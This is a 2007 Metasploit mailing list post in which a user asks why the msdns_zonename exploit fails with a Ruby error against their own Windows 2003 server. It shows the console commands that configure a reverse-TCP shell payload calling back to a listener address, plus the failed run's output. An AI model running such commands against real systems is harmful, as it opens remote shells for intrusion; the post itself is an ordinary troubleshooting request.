Metasploit mailing list archives

Problem exploiting the MS DNS RPC Service (msdns_zonename)


From: securitux at gmail.com (Jason Thompson)
Date: Wed, 6 Jun 2007 22:28:52 -0400

Hi all. I am trying to get the MS DNS exploit to work, everytime I try
it against my vulnerable Windows 2003 server I get this:



set PAYLOAD windows/shell_reverse_tcp

PAYLOAD => windows/shell_reverse_tcp

set LHOST 192.168.0.211

LHOST => 192.168.0.211

set LPORT 4444

LPORT => 4444

set RHOST 192.168.0.207

RHOST => 192.168.0.207

exploit

[*] Started reverse handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1028
[-] Exploit failed: undefined method `name' for nil:NilClass

msf exploit(msdns_zonename) >



Any ideas? THanks!

-J



Current thread: